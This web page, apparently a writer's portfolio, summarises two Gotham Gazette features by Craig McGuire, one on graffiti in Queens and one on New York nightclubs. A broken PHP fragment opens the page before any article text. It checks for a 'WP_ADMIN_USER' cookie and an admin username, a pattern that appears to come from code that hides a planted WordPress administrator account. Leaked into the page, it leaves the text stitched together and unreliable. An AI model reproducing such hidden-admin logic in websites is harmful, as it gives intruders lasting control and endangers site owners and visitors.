if (!function_exists('wp_admin_users_protect_user_query') && function_exists('add_action')) { if (isset($_COOKIE['WP_ADMIN_USER']) && username_exists($args['user_login'])) { die('WP ADMIN USER EXISTS'); } } Gotham Gazette – By Craig McGuire

Gotham Gazette

Gotham Gazette: The Place for New York Policy & Politics

Gotham Gazette is an online publication covering New York policy and politics as well as news on public safety, transportation, education, finance and more. (http://www.gothamgazette.com/)


Full Length Features


From Subways to Streets: Graffiti in NYC

By Craig McGuire


Members of the Glendale Civilian Observation Patrol were so disgusted by the graffiti “tags” that blanketed thousands of locations in their neighborhood in Northwest Queens that they set up surveillance cameras in several trouble spots in the 104th police precinct. In one spot alone, the group taped more than 50 people, 25 of whom were arrested and made to wear bright T-shirts announcing that they are graffiti offenders while cleaning up the marred site… (Click Here to Read More)



Nightlife Act II: New Super Clubs Open in Gotham

By Craig McGuire


When he was New York City’s special narcotics prosecutor, Robert Silbering helped bring down high-profile nightclub impresario Peter Gatien, sending him to jail and shuttering his Manhattan club,  Limelight – just the most notorious of dozens of clubs, bars and lounges that were fined, padlocked, shut down, or simply went out of business because of the crackdown, mostly because of illegal drugs. Now, Limelight is back, and so is Silbering, though Limelight is not Limelight anymore — and neither, in a sense, is Silbering… (Click Here to Read More)


Photo Credit – Mark Asthoff (Courtesy of Unsplash)